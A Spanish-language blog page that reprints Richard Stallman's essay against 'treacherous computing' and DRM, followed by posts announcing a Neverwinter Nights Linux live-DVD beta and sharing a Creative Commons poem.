La idea técnica detrás de la computación traidora es que la computadora incluye un dispositivo de cifrado y firma digital, y las claves se mantienen secretas para usted. Los programas privativos usan este dispositivo para controlar qué otros programas puede ejecutar, a qué documentos o datos puede acceder y a qué programas se los puede transferir. Esos programas continuamente descargarán nuevas reglas de autorización a través de Internet, e impondrán dichas reglas automáticamente a su trabajo. Si usted no permite a su computadora obtener las nuevas reglas periódicamente de Internet, algunas capacidades dejarán automáticamente de funcionar.
Por supuesto, Hollywood y las compañías discográficas planean usar la computación traidora para "DRM" ("Administración de Restricciones Digitales" o "Digital Restriction Management", en inglés), así los vídeos y la música descargados podrán ser reproducidos sólo en una computadora específica. Compartir será completamente imposible, al menos usando los archivos autorizados que deberá obtener de dichas compañías. Usted, el público, debería tener la libertad y la habilidad de compartir esas cosas. (Espero que alguien encuentre la forma de producir versiones no cifradas, y de subirlas y compartirlas, así DRM no tendrá éxito completamente, pero esto no es excusa para el sistema).
Hacer imposible el compartir ya es lo suficientemente malo, pero se pone peor. Existen planes para usar la misma facilidad al enviar documentos por correo electrónico -- resultando en mensajes que desaparecen en dos semanas, o documentos que sólo pueden ser leídos en las computadoras de determinada compañía.
Imagínese si usted recibiera un mensaje de correo electrónico de su jefe diciéndole que haga algo que usted piensa que es arriesgado; un mes después, cuando el tiro sale por la culata no puede usar el mensaje para mostrar que la decisión no fue suya. "Ponerlo por escrito" no lo protege si la orden está escrita en tinta que desaparece.
Imagínese si usted recibe un mensaje de correo electrónico de su jefe estableciendo una política que es ilegal o inmoral, tal como destrozar los documentos de auditoría de su compañía, o permitir que una amenaza peligrosa para su país avance sin ser controlada. Actualmente, usted puede enviar esto a un periodista y exponer la actividad. Con la computación traidora, el periodista no será capaz de leer el documento; su computadora se negará a obedecerlo. La computación traidora se transforma en un paraíso para la corrupción.
Los procesadores de texto tales como Microsoft Word podrían usar la computación traidora cuando usted guarde sus documentos, para asegurarse de que ningún procesador de texto de la competencia podrá leerlos. Actualmente debemos averiguar los secretos del formato de Word mediante laboriosos experimentos, para que los procesadores libres puedan leer documentos de Word. Si Word cifra los documentos usando computación traidora cuando los guarda, la comunidad del software libre no tendrá la posibilidad de desarrollar software para leerlos -- y si pudiéramos, tales programas podrían ser prohibidos por la Digital Millennium Copyright Act (Ley de Copyright del Milenio Digital).
Los programas que usen computación traidora continuamente descargarán nuevas reglas de autorización desde Internet, e impondrán dichas reglas a su trabajo. Si a Microsoft, o al gobierno de los EEUU no les agrada lo que usted dice en un documento que escribió, podrán publicar nuevas restricciones diciendo a todas las computadoras que se rehusen a dejar que alguien lea dicho documento. Cada computadora del mundo obedecerá cuando descargue las nuevas instrucciones. Su escrito estará sujeto a un borrado retroactivo estilo 1984. Hasta usted podría ser incapaz de leerlo.
Podría pensar que usted puede averiguar que cosas sucias hace una aplicación de computación traidora, estudiar qué tan dañinas son, y decidir si aceptarlas. Sería ingenuo aceptarlo, pero el punto es que el trato que cree que está haciendo no se mantendrá. Una vez que usted dependa del uso del programa, estará enganchado y ellos lo saben; entonces pueden cambiar el trato. Algunas aplicaciones automáticamente bajarán actualizaciones que harán algo diferente -- y no le darán la posibilidad de elegir si desea la actualización o no.
Actualmente puede evitar ser restringido por software privativo no usándolo. Si ejecuta GNU/Linux u otro sistema operativo libre, y si evita instalar aplicaciones propietarias sobre él, entonces usted está al mando de lo que su computadora hace. Si un programa libre tiene una característica maliciosa, otros desarrolladores en la comunidad la quitarán y usted puede usar la versión corregida. Puede también ejecutar aplicaciones y herramientas libres en sistemas operativos no libres; esto falla completamente en darle libertad, pero muchos usuarios lo hacen.
La computación traidora pone en peligro la existencia de sistemas operativos y aplicaciones libres, porque usted ya no podrá ejecutarlas. Algunas versiones de la computación traidora requerirán que el sistema operativo esté específicamente autorizado por una compañía particular. Los sistemas operativos libres no podrán ser instalados. Algunas versiones de la computación traidora requerirán que cada programa sea específicamente autorizado por el desarrollador del sistema operativo. No podrá ejecutar aplicaciones libres en tales sistemas. Si usted averigua cómo hacerlo y se lo dice a alguien, eso podría constituir un delito.
Existen proyectos de ley en EEUU que requieren que todas las computadoras soporten computación traidora, y que se prohiba la conexión de computadoras antiguas a Internet. La CBDTPA (la llamamos Ley Consuma Pero No Trate de Programar, Consume But Don't Try Programming Act, en inglés) es uno de ellos. Pero inclusive si no lo fuerzan legalmente a migrar hacia la computación traidora, la presión para aceptarla puede ser enorme. Actualmente las personas usualmente utilizan el formato Word para comunicarse, aunque esto causa varios tipos de problemas (vea "Podemos Acabar con los Archivos Adjuntos en Word"). Si solamente una máquina de computación traidora puede leer los últimos documentos de Word, mucha gente migrará hacia ella, si ven la situación sólo en términos de acción individual (tómalo o déjalo). Para oponernos a la computación traidora, debemos unirnos y confrontar la situación como una elección colectiva.
Para mayor información sobre computación traidora, vea
Bloquear la computación traidora requerirá que se organicen un gran número de ciudadanos. ¡Necesitamos su ayuda!. La Electronic Frontier Foundation (Fundación Frontera Electrónica) y Public Knowledge (Conocimiento Público) están organizando campañas en contra de la computación traidora, así como también el Digital Speech Project (Proyecto Expresión Digital) esponsorizado por la FSF. Por favor, visite estos sitios Web para poder sumarse y apoyar de su trabajo.
También puede ayudar escribiendo a las oficinas de asuntos públicos de Intel, IBM, HP/Compaq, o cualquiera a quien usted le haya comprado una computadora, explicándole que no quiere ser presionado a comprar sistemas de computación "confiable", por lo cual no está de acuerdo en que ellos los produzcan. Esto puede ejercer la presión del poder del consumidor. Si usted hace esto, por favor envíe copias de sus cartas a las organizaciones antes citadas.
Posdatas
El proyecto GNU distribuye GNU Privacy Guard, un programa que implementa cifrado de clave pública y firmas digitales, el cual puede utilizase para enviar mensajes de correo electrónico seguros y privados. Es muy ilustrativo examinar cómo GPG se diferencia de la computación traidora, y ver qué hace a una tan útil y a la otra tan peligrosa.
Cuando alguien usa GPG para enviarle un documento cifrado y usted usa GPG para decodificarlo, el resultado es un documento no cifrado que usted puede leer, reenviar, copiar e inclusive re-cifrar para enviarlo de forma segura a un tercero. Una aplicación de computación traidora lo dejaría leer las palabras en la pantalla, pero no producir un documento no cifrado que pudiera usar de otras formas. GPG, un paquete de software libre, pone las funciones de seguridad a disposición de los usuarios: ellos lo usan. La computación traidora está diseñada para imponer restricciones a los usuarios: ella los usa.
Microsoft presenta a palladium como una medida de seguridad, y proclama que brindará protección contra virus, pero esta afirmación es evidentemente falsa. Una presentación de Microsoft Research en octubre de 2002 estableció que una de las especificaciones de palladium es que los sistemas operativos y aplicaciones existentes seguirán pudiéndose ejecutar, por lo tanto, los virus seguirán siendo capaces de hacer todas las cosas que hacen actualmente.
Cuando Microsoft habla de "seguridad" con relación a palladium, no lo hace con el significado que normalmente asociamos a esa palabra: proteger a su computadora de cosas que usted no desea. Ellos se refieren a proteger su acceso a las copias de datos en su computadora de formas que otros no desean que se realice. Una diapositiva en la presentación enumeraba varios tipos de secretos que palladium podría resguardar, incluyendo "secretos de terceras partes" y "secretos de usuario" -- pero poniendo "secretos de usuario" entre comillas, reconociendo que es un absurdo en el contexto de palladium.
La presentación hizo uso frecuente de otros términos que usualmente asociamos en el contexto de seguridad, tales como "ataque", "código malicioso", "engaño" ("spoofing", en inglés), así como también "confianza". Ninguno de esos términos tiene el significado usual. "Ataque" no significa alguien tratando de dañarlo a usted, sino usted intentando copiar música. "Código malicioso" significa código instalado por usted para hacer algo que otros no desean que su computadora haga. "Engaño" no significa alguien engañándolo, sino usted engañando a palladium. Y así sucesivamente.
Una declaración previa de los desarrolladores de palladium establecía la premisa básica que quien hubiera desarrollado o recolectado información debía tener control total sobre cómo usted la usa. Esto hubiera representado una vuelta revolucionaria de ideas pasadas acerca de éticas y del sistema legal, y creado un sistema de control sin precedentes. Los problemas específicos de esos sistemas no son accidentales; sino que resultan de metas básicas. Es la meta que debemos rechazar.
Copyright © 2002 Richard Stallman.
Está permitida la distribución y copia literal de este artículo completo en cualquier medio, siempre que se preserve esta nota.
domingo, 30 de marzo de 2008
NWN/Live Beta I lista
Saludos a los pocos amigos que leen el blog ya sea desde Blogger o desde les feeds.
Bue, tal como dice el titulo, la Beta I ya esta lista, y tan solo falta subirla a internet xD, lo cual sera un feo problema pero ya me lidiare con el.
Caracteristicas
> Basada en Arch Linux, usando un kernel stock 2.6.24
> Incluye la ultima version estable de NWN incluyendo las expansiones oficiales y la comunitaria CEPv2
> Tiene instalado el hack para que use mouse por hardware y no por software
> Soporte para un monton de tarjetas de video, incluyendo el controlador libre RadeonHD y un sistema avanzado de autoconfiguracion automatico
> Kooldock y OpenBox3 para una agradable experiencia de uso
> Thunar y Firefox como utilidades adicionales
> Un nuevo instalador grafico - Archin - que copia el contenido del Live-DVD al disco duro y quita lo que solo sirve para Live-DVD, parte del proyecto Larch
De momento no esta terminado, es obviamente la primera beta y publica, es por ello que espero nos ayuden con el testeo una vez que la hayan descargado, si les interesa colaborar con el desarrollo o testing solo dejen un mensaje aqui o manden un correo a *lord.ltsmash gmail com*
Bue, tal como dice el titulo, la Beta I ya esta lista, y tan solo falta subirla a internet xD, lo cual sera un feo problema pero ya me lidiare con el.
Caracteristicas
> Basada en Arch Linux, usando un kernel stock 2.6.24
> Incluye la ultima version estable de NWN incluyendo las expansiones oficiales y la comunitaria CEPv2
> Tiene instalado el hack para que use mouse por hardware y no por software
> Soporte para un monton de tarjetas de video, incluyendo el controlador libre RadeonHD y un sistema avanzado de autoconfiguracion automatico
> Kooldock y OpenBox3 para una agradable experiencia de uso
> Thunar y Firefox como utilidades adicionales
> Un nuevo instalador grafico - Archin - que copia el contenido del Live-DVD al disco duro y quita lo que solo sirve para Live-DVD, parte del proyecto Larch
De momento no esta terminado, es obviamente la primera beta y publica, es por ello que espero nos ayuden con el testeo una vez que la hayan descargado, si les interesa colaborar con el desarrollo o testing solo dejen un mensaje aqui o manden un correo a *lord.ltsmash
viernes, 21 de marzo de 2008
Hoy fume peyote
Esto es lo que pasa cuando fumas peyote, obtienes una "oda al ser critico"
olvide que les doy permiso de usar esta obra (xD) bajo la licencia Creative Commons-Share Alike :p
Agua, viento, tierra y fuego...
Todo es energía
Gaia, elementos fisicos, elementos virtuales
nadie sabe lo que pasa,
pero todos creen saber.
Mundo coordinado, mundo controlado
La vida viene y va
dicen los ancianos
Jamás he muerto, jamás moriré
Mi meta: critico ser
Oye mi oda, escuchala
¿Comprendes que no tiene vida?
Mirate, observate
¿Entiendes que muerto estás aunque el tiempo siga?
Muchos dicen saber,
hablan, explican y no callan;
yo digo que la gracia está en el ser
La vida sigue pero muerto te hallas
¿Que es la vida si no la puedes entender?
Llaman tonto al sabio,
necio al observador,
rebelde al liberal,
¿Como te llamas a tí?
Al fin que vivo no estás.
Que muera la espontaneidad,
Que muera el saber,
A ti no te interesa conocer,
al fin que solo quieres placer.
Una gota mas en el mar.
¿Como podemos afirmar algo sin conocerlo?
¿Como defendemos algo sin entenderlo?
¿Como aceptamos una verdad por obvia sin argumentos?
Eso es la vida del cualquiera,
y la muerte del ser, entiendelo...
olvide que les doy permiso de usar esta obra (xD) bajo la licencia Creative Commons-Share Alike :p
Suscribirse a:
Entradas (Atom)